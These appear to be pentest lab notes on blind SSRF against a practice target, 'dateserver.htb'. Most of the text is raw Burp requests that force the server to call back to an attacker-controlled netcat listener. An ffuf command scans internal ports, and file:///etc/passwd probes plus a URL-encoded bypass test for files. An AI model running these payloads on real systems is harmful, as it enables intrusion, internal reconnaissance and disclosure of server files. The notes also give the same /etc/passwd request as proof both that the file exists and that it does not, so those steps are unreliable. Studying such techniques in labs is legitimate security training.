BLIND SSRF
in a blind SSRF, the response does not contain the HTML response of the coerced request. the response will sometimes show an error. to verify whether there is really an SSRF vulnerability, re-run the coerced request and catch the response with Netcat.
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1/index.php&date=2024-01-02
- SSRF can be validated if the URL can be changed to point to another URL;
if the response reports no error, then there is an SSRF vulnerability
- changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
will test whether the web application responds w/o error
- this method also tests whether the SSRF vulnerability is blind or something else
Response
...
Date is unavailable. Choose a different date!
#verifying blind SSRF with Nectcat
root@oco:~$ nc -nlvp 8080
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://{attackerIP:port}&date=2024-01-02
- SSRF can be validated if the URL can be changed to point to another URL;
if the response reports no error, then there is an SSRF vulnerability
- changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
will test whether the web application responds w/o error
- this method also tests whether the SSRF vulnerability is blind or something else
root@oco:~$ ...Netcat connection
connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
GET /index.php HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*EXPLOITATION
exploiting blind SSRF depends on the web application's behavior and response.
#open/close port enumeration
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
#identify closed ports
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1:81&date=2024-01-02
- the error msgs on closed ports is used by ffuf to identify open ports
- "Something went wrong..."
- the error msgs between open/closed ports will be different
#identify open ports
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1:80&date=2024-01-02
- change the port number to determine which ports are closed
- the error msgs on closed ports is used by ffuf to identify open ports
- "Date is unavailable. Choose a different date..."
- the error msgs between open/closed ports will be different
#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Something went wrong"
* -fr means filter regexp
* 80 [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]
#identifying existing files on the system
#again the error msgs will be different between existing and non-existing files
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=file:///etc/passwd&date=2024-01-02
Response
...
Date is unavailable. Choose a different date
- this means that the file exist
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=file:///etc/passwd&date=2024-01-02
Response
...
Something went wrong!
- this means that the file DOES'NT exist
#LFI: bypassing URL restrictions or access controls
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=file%3A%2F%2F%2Fetc%2Fpasswd&date=2024-01-02Last updated